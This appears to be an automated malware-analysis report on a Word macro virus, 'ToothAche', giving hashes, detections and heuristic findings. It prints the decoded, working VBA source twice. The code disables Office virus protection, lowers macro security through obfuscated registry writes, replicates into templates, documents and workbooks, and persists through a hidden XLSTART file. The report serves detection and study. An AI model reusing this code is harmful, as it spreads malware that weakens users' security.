Office (OLE) malware analysis — malicious · d40f0b717d93fa3b

MALICIOUS

Office (OLE)

67.0 KB Created: 2001-05-26 08:22:00 Authoring application: Microsoft Word 10.0 First seen: 2015-10-13

MD5: 7d25f383958f4caf6ac582249a9b0230 SHA-1: bcc59ed4de9a12a20f2adfe8f755861bcf37cc50 SHA-256: d40f0b717d93fa3bcd6743b48b8c61a4de71d731f6bac53965bdd836a331cd17

260 Risk Score

Heuristics 6

ClamAV: Doc.Trojan.Toot-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Toot-1
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
.deletelines _
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
CreateObject("Word.Application")
```
GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
GetObject(, _
```
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE

The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
Matched line in script
```
Dir(Application.StartupPath _
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12737 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12737 bytes
SHA-256: `012f442fd72a9481396759222b5809311713764c40a4eb42285040c08e9d4481`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'ToothAche by Kernel32 Private _ Sub _ Workbook_Deactivate() On _ Error _ Resume _ Next With _ ThisWorkbook With _ .VBProject With _ .vbcomponents("ThisWorkBook") With _ .CodeModule Code _ = _ .Lines(1, _ .countoflines) End _ With End _ With End _ With End _ With Set _ wrd _ = _ GetObject(, _ "Word.Application") wason _ = _ 1 If _ wrd _ = _ "" _ Then Set _ wrd _ = _ CreateObject("Word.Application") wason _ = _ 0 End _ If With _ wrd With _ .System .PrivateProfileString("", _ Chr(72) _ & _ Chr(75) _ & _ Chr(69) _ & _ Chr(89) _ & _ Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(56) & Chr(46) & Chr(48) & Chr(92) & Chr(69) & Chr(120) & Chr(99) & Chr(101) & Chr(108) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(32) & Chr(69) & Chr(120) & Chr(99) & Chr(101) & Chr(108), Chr(79) & Chr(112) & Chr(116) & Chr(105) & Chr(111) & Chr(110) & Chr(115) & Chr(54)) = &H0 .PrivateProfileString("", _ Chr(72) _ & _ Chr(75) _ & _ Chr(69) _ & _ Chr(89) _ & _ Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(57) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(76) & Chr(101) & Chr(118) & Chr(101) & Chr(108)) = 1& .PrivateProfileString("", _ Chr(72) _ & _ Chr(75) _ & _ Chr(69) _ & _ Chr(89) _ & _ Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(76) & Chr(101) & Chr(118) & Chr(101) & Chr(108)) = 1& If _ .PrivateProfileString("", _ Chr(72) _ & _ Chr(75) _ & _ Chr(69) _ & _ Chr(89) _ & Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(65) & Chr(99) & Chr(99) & Chr(101) & Chr(115) & Chr(115) & Chr(86) & Chr(66) & Chr(79) & Chr(77)) <> 1& Then .PrivateProfileString("", _ Chr(72) _ & _ Chr(75) _ & _ Chr(69) _ & _ Chr(89) _ & _ Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(65) & Chr(99) & Chr(99) & Chr(101) & Chr(115) & Chr(115) & Chr(86) & Chr(66) & Chr(79) & Chr(77)) = 1& End _ If End _ With With _ .Options .VirusProtection _ = _ 0 .SaveNormalPrompt _ = _ 0 End _ With With _ .Application .DisplayAlerts _ = _ wdAlertsNone End _ With End _ With With _ wrd With _ .NormalTemplate With _ .VBProject With _ .vbcomponents("ThisDocument") With _ .CodeModule .deletelines _ 1, _ .countoflines .addfromstring _ Code End _ With End _ With End _ With End _ With End _ With For _ Each _ fly _ In _ wrd.Documents With _ fly With _ .VBProject With _ .vbcomponents("ThisDocument") With _ .CodeModule .deletelines _ 1, _ .countoflines .addfromstring _ Code End _ With End _ With End _ With End _ With Next If _ wason _ = _ 0 _ Then _ wrd.Quit If _ Dir(Application.StartupPath _ & _ "\Toothache.xls") _ = _ "Toothache.xls" _ Then _ inst _ = _ 1 If _ inst _ <> _ 1 _ Then With _ Workbooks .Add.SaveAs _ FileName:=Application.StartupPath _ & _ "\Toothache.xls" End _ With With _ ActiveWorkbook With _ .VBProject With _ .vbcomponents("ThisWorkBook") .deletelines _ 1, _ .countoflines .addfromstring _ Code End _ With End _ With End _ With With _ ActiveWindow .Visible _ = _ 0 End _ With Workbooks("Toothache.xls").Save ActiveWorkbook.Save End _ If For _ Each _ fly _ In _ Workbooks With _ fly With _ .VBProject With _ .vbcomponents("ThisWorkBook") With _ .CodeModule .deletelines _ 1, _ .countoflines .addfromstring _ Code End _ With End _ With End _ With End _ With Next End _ Sub Private _ Sub _ document_Close() On _ Error _ Resume _ Next With _ ThisDocument With _ .VBProject With _ .vbcomponents("ThisDocument") With _ .CodeModule Code _ = _ .Lines(1, _ .countoflines) End _ With End _ With End _ With End _ With Set _ EXL _ = _ GetObject(, _ "Excel.Application") wason _ = _ 1 If _ EXL _ = _ "" _ Then Set _ EXL _ = _ CreateObject("Excel.Application") wason _ = _ 0 End _ If With _ EXL With _ .Application .DisplayAlerts _ = _ wdAlertsNone End _ With End _ With If _ Dir(EXL.Application.StartupPath _ & _ "\Toothache.xls") _ = _ "Toothache.xls" _ Then _ inst _ = _ 1 If _ inst _ <> _ 1 _ Then With _ EXL.Workbooks .Add.SaveAs _ FileName:=EXL.Application.StartupPath _ & _ "\Toothache.xls" End _ With With _ ActiveWorkbook With _ .VBProject With _ .vbcomponents("ThisWorkBook") .deletelines _ 1, _ .countoflines .addfromstring _ Code End _ With End _ With End _ With With _ EXL.ActiveWindow .Visible _ = _ 0 End _ With EXL.Workbooks("Toothache.xls").Save EXL.ActiveWorkbook.Save End _ If For _ Each _ fly _ In _ EXL.Workbooks With _ fly With _ .VBProject With _ .vbcomponents("ThisWorkBook") With _ .CodeModule .deletelines _ 1, _ .countoflines .addfromstring _ Code End _ With End _ With End _ With End _ With Next If _ wason _ = _ 0 _ Then _ EXL.Quit With _ System .PrivateProfileString("", _ Chr(72) _ & _ Chr(75) _ & _ Chr(69) _ & _ Chr(89) _ & _ Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(56) & Chr(46) & Chr(48) & Chr(92) & Chr(69) & Chr(120) & Chr(99) & Chr(101) & Chr(108) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(32) & Chr(69) & Chr(120) & Chr(99) & Chr(101) & Chr(108), Chr(79) & Chr(112) & Chr(116) & Chr(105) & Chr(111) & Chr(110) & Chr(115) & Chr(54)) = &H0 .PrivateProfileString("", _ Chr(72) _ & _ Chr(75) _ & _ Chr(69) _ & _ Chr(89) _ & _ Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(57) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(76) & Chr(101) & Chr(118) & Chr(101) & Chr(108)) = 1& .PrivateProfileString("", _ Chr(72) _ & _ Chr(75) _ & _ Chr(69) _ & _ Chr(89) _ & _ Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(76) & Chr(101) & Chr(118) & Chr(101) & Chr(108)) = 1& If _ .PrivateProfileString("", _ Chr(72) _ & _ Chr(75) _ & _ Chr(69) _ & _ Chr(89) _ & Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(65) & Chr(99) & Chr(99) & Chr(101) & Chr(115) & Chr(115) & Chr(86) & Chr(66) & Chr(79) & Chr(77)) <> 1& Then .PrivateProfileString("", _ Chr(72) _ & _ Chr(75) _ & _ Chr(69) _ & _ Chr(89) _ & _ Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(65) & Chr(99) & Chr(99) & Chr(101) & Chr(115) & Chr(115) & Chr(86) & Chr(66) & Chr(79) & Chr(77)) = 1& End _ If End _ With With _ Options .VirusProtection _ = _ 0 With _ .Application .DisplayAlerts _ = _ wdAlertsNone End _ With End _ With For _ Each _ fly _ In _ Documents With _ fly With _ .VBProject With _ .vbcomponents("ThisDocument") With _ .CodeModule .deletelines _ 1, _ .countoflines .addfromstring _ Code End _ With End _ With End _ With End _ With Next With _ NormalTemplate With _ .VBProject With _ .vbcomponents("ThisDocument") With _ .CodeModule .deletelines _ 1, _ .countoflines .addfromstring _ Code End _ With End _ With End _ With End _ With End _ Sub Attribute VB_Name = "ThisDocument1" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 012f442fd72a9481396759222b5809311713764c40a4eb42285040c08e9d4481

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'ToothAche by Kernel32
Private _
Sub _
Workbook_Deactivate()
On _
Error _
Resume _
Next
With _
ThisWorkbook
With _
.VBProject
With _
.vbcomponents("ThisWorkBook")
With _
.CodeModule
Code _
= _
.Lines(1, _
.countoflines)
End _
With
End _
With
End _
With
End _
With
Set _
wrd _
= _
GetObject(, _
"Word.Application")
wason _
= _
1
If _
wrd _
= _
"" _
Then
Set _
wrd _
= _
CreateObject("Word.Application")
wason _
= _
0
End _
If
With _
wrd
With _
.System
.PrivateProfileString("", _
Chr(72) _
& _
Chr(75) _
& _
Chr(69) _
& _
Chr(89) _
& _
Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(56) & Chr(46) & Chr(48) & Chr(92) & Chr(69) & Chr(120) & Chr(99) & Chr(101) & Chr(108) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(32) & Chr(69) & Chr(120) & Chr(99) & Chr(101) & Chr(108), Chr(79) & Chr(112) & Chr(116) & Chr(105) & Chr(111) & Chr(110) & Chr(115) & Chr(54)) = &H0
.PrivateProfileString("", _
Chr(72) _
& _
Chr(75) _
& _
Chr(69) _
& _
Chr(89) _
& _
Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(57) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(76) & Chr(101) & Chr(118) & Chr(101) & Chr(108)) = 1&
.PrivateProfileString("", _
Chr(72) _
& _
Chr(75) _
& _
Chr(69) _
& _
Chr(89) _
& _
Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(76) & Chr(101) & Chr(118) & Chr(101) & Chr(108)) = 1&
If _
.PrivateProfileString("", _
Chr(72) _
& _
Chr(75) _
& _
Chr(69) _
& _
Chr(89) _
& Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(65) & Chr(99) & Chr(99) & Chr(101) & Chr(115) & Chr(115) & Chr(86) & Chr(66) & Chr(79) & Chr(77)) <> 1& Then
.PrivateProfileString("", _
Chr(72) _
& _
Chr(75) _
& _
Chr(69) _
& _
Chr(89) _
& _
Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(65) & Chr(99) & Chr(99) & Chr(101) & Chr(115) & Chr(115) & Chr(86) & Chr(66) & Chr(79) & Chr(77)) = 1&
End _
If
End _
With
With _
.Options
.VirusProtection _
= _
0
.SaveNormalPrompt _
= _
0
End _
With
With _
.Application
.DisplayAlerts _
= _
wdAlertsNone
End _
With
End _
With
With _
wrd
With _
.NormalTemplate
With _
.VBProject
With _
.vbcomponents("ThisDocument")
With _
.CodeModule
.deletelines _
1, _
.countoflines
.addfromstring _
Code
End _
With
End _
With
End _
With
End _
With
End _
With
For _
Each _
fly _
In _
wrd.Documents
With _
fly
With _
.VBProject
With _
.vbcomponents("ThisDocument")
With _
.CodeModule
.deletelines _
1, _
.countoflines
.addfromstring _
Code
End _
With
End _
With
End _
With
End _
With
Next
If _
wason _
= _
0 _
Then _
wrd.Quit
If _
Dir(Application.StartupPath _
& _
"\Toothache.xls") _
= _
"Toothache.xls" _
Then _
inst _
= _
1
If _
inst _
<> _
1 _
Then
With _
Workbooks
.Add.SaveAs _
FileName:=Application.StartupPath _
& _
"\Toothache.xls"
End _
With
With _
ActiveWorkbook
With _
.VBProject
With _
.vbcomponents("ThisWorkBook")
.deletelines _
1, _
.countoflines
.addfromstring _
Code
End _
With
End _
With
End _
With
With _
ActiveWindow
.Visible _
= _
0
End _
With
Workbooks("Toothache.xls").Save
ActiveWorkbook.Save
End _
If
For _
Each _
fly _
In _
Workbooks
With _
fly
With _
.VBProject
With _
.vbcomponents("ThisWorkBook")
With _
.CodeModule
.deletelines _
1, _
.countoflines
.addfromstring _
Code
End _
With
End _
With
End _
With
End _
With
Next
End _
Sub
Private _
Sub _
document_Close()
On _
Error _
Resume _
Next
With _
ThisDocument
With _
.VBProject
With _
.vbcomponents("ThisDocument")
With _
.CodeModule
Code _
= _
.Lines(1, _
.countoflines)
End _
With
End _
With
End _
With
End _
With
Set _
EXL _
= _
GetObject(, _
"Excel.Application")
wason _
= _
1
If _
EXL _
= _
"" _
Then
Set _
EXL _
= _
CreateObject("Excel.Application")
wason _
= _
0
End _
If
With _
EXL
With _
.Application
.DisplayAlerts _
= _
wdAlertsNone
End _
With
End _
With
If _
Dir(EXL.Application.StartupPath _
& _
"\Toothache.xls") _
= _
"Toothache.xls" _
Then _
inst _
= _
1
If _
inst _
<> _
1 _
Then
With _
EXL.Workbooks
.Add.SaveAs _
FileName:=EXL.Application.StartupPath _
& _
"\Toothache.xls"
End _
With
With _
ActiveWorkbook
With _
.VBProject
With _
.vbcomponents("ThisWorkBook")
.deletelines _
1, _
.countoflines
.addfromstring _
Code
End _
With
End _
With
End _
With
With _
EXL.ActiveWindow
.Visible _
= _
0
End _
With
EXL.Workbooks("Toothache.xls").Save
EXL.ActiveWorkbook.Save
End _
If
For _
Each _
fly _
In _
EXL.Workbooks
With _
fly
With _
.VBProject
With _
.vbcomponents("ThisWorkBook")
With _
.CodeModule
.deletelines _
1, _
.countoflines
.addfromstring _
Code
End _
With
End _
With
End _
With
End _
With
Next
If _
wason _
= _
0 _
Then _
EXL.Quit
With _
System
.PrivateProfileString("", _
Chr(72) _
& _
Chr(75) _
& _
Chr(69) _
& _
Chr(89) _
& _
Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(56) & Chr(46) & Chr(48) & Chr(92) & Chr(69) & Chr(120) & Chr(99) & Chr(101) & Chr(108) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(32) & Chr(69) & Chr(120) & Chr(99) & Chr(101) & Chr(108), Chr(79) & Chr(112) & Chr(116) & Chr(105) & Chr(111) & Chr(110) & Chr(115) & Chr(54)) = &H0
.PrivateProfileString("", _
Chr(72) _
& _
Chr(75) _
& _
Chr(69) _
& _
Chr(89) _
& _
Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(57) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(76) & Chr(101) & Chr(118) & Chr(101) & Chr(108)) = 1&
.PrivateProfileString("", _
Chr(72) _
& _
Chr(75) _
& _
Chr(69) _
& _
Chr(89) _
& _
Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(76) & Chr(101) & Chr(118) & Chr(101) & Chr(108)) = 1&
If _
.PrivateProfileString("", _
Chr(72) _
& _
Chr(75) _
& _
Chr(69) _
& _
Chr(89) _
